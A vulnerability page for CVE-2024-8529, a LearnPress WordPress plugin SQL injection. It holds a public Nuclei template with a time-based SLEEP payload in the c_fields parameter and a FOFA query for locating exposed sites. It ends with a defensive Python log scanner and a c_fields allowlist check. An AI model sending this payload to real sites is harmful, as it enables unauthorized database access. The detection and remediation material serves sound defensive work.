The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
PoC code [public]
id: CVE-2024-8529

info:
  name: LearnPress < 4.2.7.1 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
  remediation: |
    Update the LearnPress plugin to version 4.2.7.1 or later.
  reference:
    - https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8529
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-8529
    cwe-id: CWE-89
    epss-score: 0.68004
    epss-percentile: 0.98546
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="wp-content/plugins/learnpress"
    vendor: thimpress
    product: learnpress
  tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "contains(content_type, 'application/json')"
          - contains_all(body, 'id\":', 'name\":')
        condition: and
# digest: 490a00463044022079fdabd2e011c5387727cb5cb71dce0515b2572048f4c1afccb4fbcb45215ffc0220673650d651159105bada010a49ebfd3e796e549c0fc596ed5cc98812d6f3b93a:922c64590222798bb761d5b6d8e72950
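As an added example (not part of the template above or of the LearnPress project): a defender-side check that scans web access log lines for requests to the course endpoints named on this page whose `c_fields` value is anything other than a comma-separated identifier list, together with the allowlist test a server-side validation of that parameter would apply. The log lines, endpoint list and allowlist regex are constructed for illustration; the actual LearnPress fix is not reproduced here.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines for this example (not real traffic). The
# second and third reuse the template's own probe, the third percent-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /wp-json/learnpress/v1/courses?c_fields=id,name HTTP/1.1" 200 1532
203.0.113.9 - - [01/Jan/2025:10:00:07 +0000] "GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1" 200 1532
198.51.100.2 - - [01/Jan/2025:10:00:09 +0000] "GET /wp-json/lp/v1/courses/archive-course?c_fields=%28SELECT%280%29FROM%28SELECT%28SLEEP%286%29%29%29a%29 HTTP/1.1" 200 98
192.0.2.7 - - [01/Jan/2025:10:00:11 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 4021
"""

# Endpoints named on the page (template request and advisory text); assumed complete here.
LP_COURSE_PATHS = ("/wp-json/learnpress/v1/courses", "/wp-json/lp/v1/courses/archive-course")
# A field list should only ever be comma-separated column identifiers.
SAFE_FIELDS = re.compile(r"^[A-Za-z0-9_]+(,[A-Za-z0-9_]+)*$")
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_safe_c_fields(value: str) -> bool:
    """Allowlist check of the kind a server-side validation of c_fields should apply."""
    return bool(SAFE_FIELDS.match(value))


def suspicious_requests(log_text: str) -> list[dict]:
    """Return records for requests whose c_fields is not a plain identifier list."""
    findings = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path not in LP_COURSE_PATHS:
            continue
        # parse_qs percent-decodes once; the extra unquote_plus catches double-encoding.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("c_fields", []):
            value = unquote_plus(raw)
            if not is_safe_c_fields(value):
                findings.append({"client": line.split()[0], "path": parts.path, "c_fields": value})
    return findings


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['client']} {hit['path']} c_fields={hit['c_fields']!r}")
```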